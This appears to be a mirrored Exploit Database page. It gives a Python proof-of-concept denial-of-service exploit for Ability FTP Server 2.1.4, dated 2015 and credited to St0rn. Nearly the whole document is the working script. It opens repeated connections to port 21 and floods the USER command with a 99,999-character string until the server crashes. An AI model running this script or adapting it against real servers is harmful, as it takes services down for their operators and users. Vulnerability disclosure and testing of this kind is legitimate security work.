Ability FTP Server 2.1.4 – ‘afsmain.exe’ ‘USER’ Remote Denial of Service

Exploit Database
138 阅读

作者： St0rn

日期： 2015-08-15
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/37775/

#!/usr/bin/env python

# Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos

# Date: 2015-08-15

# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>

# Twitter: st0rnpentest

# Vendor Homepage: www.codecrafters.com

# Software Link: http://www.codecrafters.com/AbilityFTPServer

# Version: 2.1.4

# Tested on: Windows 7

import socket

import sys

import os

def clear():

os.system("cls")

def banner():

print "############################################".center(80)

print "#Ability FTP Server DoS PoC#".center(80)

print "# Author: St0rn#".center(80)

print "#<fabien[at]anbu-pentest[dot]com>#".center(80)

print "############################################".center(80)

def createconn(ip):

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

s.connect((ip,21))

except:

print "\n"

print "[+] Server Down!".center(80)

sys.exit(0)

return s

def crash(sock):

try:

while 1:

sock.send('USER '+'a'*99999)

sys.stdout.write('.')

except:

sock.close()

############### Main ###############

clear()

banner()

if len(sys.argv)==2:

print "\n"

print "Waiting 2 or 3 minutes before crash".center(80)

print "(The server can be run without afsloader.exe)".center(80)

while 1:

s=createconn(sys.argv[1])

crash(s)

else:

print "\n"

print "Usage: AftpDos.py [Server IP]".center(80)

sys.exit(0)